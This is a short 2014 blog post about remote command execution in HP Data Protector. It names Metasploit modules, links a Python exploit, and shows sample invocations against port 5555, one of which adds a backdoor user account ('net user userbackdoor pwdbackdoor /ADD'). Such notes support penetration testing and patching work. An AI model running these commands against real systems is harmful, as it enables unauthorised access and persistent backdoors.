Tuesday, 13 May 2014

HP Data Protector Remote command execution Space Limitation

HP Data Protector < A.06.20 affected by Multiple Vulnerabilities including Remote command execution, which is very critical.

There are 2 different Metasploit Modules 

Windows --> auxiliary/admin/hp/hp_data_protector_cmd
Linux       --> exploit/linux/misc/hp_data_protector_cmd_exec

As I wanted to execute this exploit on Windows Environment there was some challenge, as I was able to execute any specific file, but was not able to pass Argument to it.

Little Challenges :
1. Specifying Executable Path
2. Execute commands with parameters

Correct Way to specify Path for executable file :

So by using \\ we can specify exact executable path.
But hang on!.....What If i want to specify "net user" command as a parameter to cmd.exe ?
which looks something similar to :

set CMD "Windows\\System32\\cmd.exe net user"

I have tried many other combinations to overcome it and none of them worked, because of this issue, we could only execute basic set of EXE available on system and nothing else!!!..

Google!....Google!...& Google!.... Found that above Exploit had limitations of spacing.
After digging up came across below mentioned link.

http://seclists.org/bugtraq/2013/Aug/60    (Python Exploit for HP Data Protector)

Python script mentioned on blog was specifically created to bypass limitation of Spacing, using which you can execute commands with parameters,


exploit.py 5555 'dir c:\'
exploit.py 5555 'ipconfig /all'
exploit.py 5555 'net user userbackdoor pwdbackdoor /ADD'

Thought to mention this here for future reference.
Hope this is helpful!...


No comments:

Post a Comment